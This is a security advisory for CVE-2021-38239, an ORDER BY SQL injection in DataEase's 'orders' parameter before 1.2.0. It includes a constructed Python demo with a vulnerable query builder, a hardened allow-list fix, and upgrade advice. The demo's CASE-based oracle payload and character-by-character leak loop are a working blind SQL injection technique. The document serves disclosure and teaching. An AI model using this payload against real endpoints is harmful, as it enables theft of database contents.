Dataease · Dataease · CVE-2021-38239
**Name of the Vulnerable Software and Affected Versions**
dataease versions prior to 1.2.0
**Description**
DataEase before 1.2.0 allows an attacker to obtain sensitive information via the `orders` parameter of the `/api/sys_msg/list/1/10` API endpoint. Values supplied in `orders` reach the backing SQL query without sanitization, so the issue is a SQL injection vulnerability: the attacker controls part of the query text and can use it to read data the endpoint was never meant to return.
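To make the impact concrete, the following is an added illustration of the bug class, not DataEase's own code, schema or fix. It assumes, as a hypothetical, that the `orders` entries are concatenated into an ORDER BY clause (a common pattern for list endpoints); the `sys_msg` and `users` tables, the SQLite in-memory database and the sample rows are all constructed for the example. It shows why an ORDER BY injection leaks data even though the endpoint only returns message IDs: a CASE expression in the sort key turns the row order into a one-bit oracle, and the hardened variant stops it by allow-listing column names and directions instead of passing strings through.

```python
"""ORDER BY injection through an `orders` list, and the allow-listed fix.

Constructed example (hypothetical schema, SQLite in-memory); not DataEase code.
"""
import sqlite3

# Constructed sample data: `users.secret` stands in for any sensitive column.
SCHEMA = """
CREATE TABLE sys_msg (id INTEGER, title TEXT);
INSERT INTO sys_msg VALUES (1, 'b'), (2, 'a'), (3, 'c');
CREATE TABLE users (id INTEGER, secret TEXT);
INSERT INTO users VALUES (1, 'hunter2');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_vulnerable(conn, orders):
    """Vulnerable pattern: each `orders` entry is concatenated verbatim into ORDER BY."""
    sql = "SELECT id FROM sys_msg"
    if orders:
        sql += " ORDER BY " + ", ".join(orders)
    return [row[0] for row in conn.execute(sql)]


ALLOWED_COLUMNS = {"id", "title"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def list_hardened(conn, orders):
    """Hardened: only allow-listed column names and directions reach the SQL text."""
    clauses = []
    for entry in orders or []:
        parts = entry.split()
        if not 1 <= len(parts) <= 2:
            raise ValueError(f"rejected order clause: {entry!r}")
        col = parts[0]
        direction = parts[1].upper() if len(parts) == 2 else "ASC"
        if col not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
            raise ValueError(f"rejected order clause: {entry!r}")
        clauses.append(f"{col} {direction}")
    sql = "SELECT id FROM sys_msg"
    if clauses:
        sql += " ORDER BY " + ", ".join(clauses)
    return [row[0] for row in conn.execute(sql)]


def is_rejected(conn, orders):
    """True if the hardened listing refuses the supplied `orders` value."""
    try:
        list_hardened(conn, orders)
    except ValueError:
        return True
    return False


def oracle(conn, position, guess):
    """Attacker payload: the sort key is `id` when one character of the secret
    matches the guess and `title` otherwise, so the row order reveals the answer."""
    payload = (
        f"(CASE WHEN (SELECT substr(secret,{position},1) FROM users WHERE id=1)"
        f"='{guess}' THEN id ELSE title END)"
    )
    return list_vulnerable(conn, [payload])


def leak_secret(conn, length, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover `length` characters of users.secret through the ORDER BY oracle.
    Sorting by id gives [1, 2, 3]; sorting by title ('b','a','c') gives [2, 1, 3]."""
    order_when_true = list_vulnerable(conn, ["id"])
    secret = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if oracle(conn, pos, ch) == order_when_true:
                secret += ch
                break
    return secret


if __name__ == "__main__":
    db = open_db()
    print("leaked via vulnerable listing:", leak_secret(db, 7))
    print("hardened listing rejects payload:", is_rejected(db, [
        "(CASE WHEN 1=1 THEN id ELSE title END)"]))
```

The allow-list is the important design choice: ORDER BY clauses cannot take bind parameters, so the fix is to map user input onto a fixed set of column names and directions rather than to escape it. Any entry that is not exactly one known column plus an optional ASC/DESC is rejected before it touches the query.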
**Recommendations**
For versions prior to 1.2.0, update to version 1.2.0 or later to resolve the issue.
As a temporary workaround, restrict access to the `/api/sys_msg/list/1/10` API endpoint (for example at the reverse proxy or by limiting it to trusted, authenticated users) to reduce exposure until the upgrade is applied.
Note that simply not using the `orders` parameter in legitimate clients does not protect the server: an attacker supplies the parameter directly, so the restriction has to be enforced server-side, either by blocking the endpoint or by rejecting requests that carry `orders` values other than the known, expected ones, until the fixed version is deployed.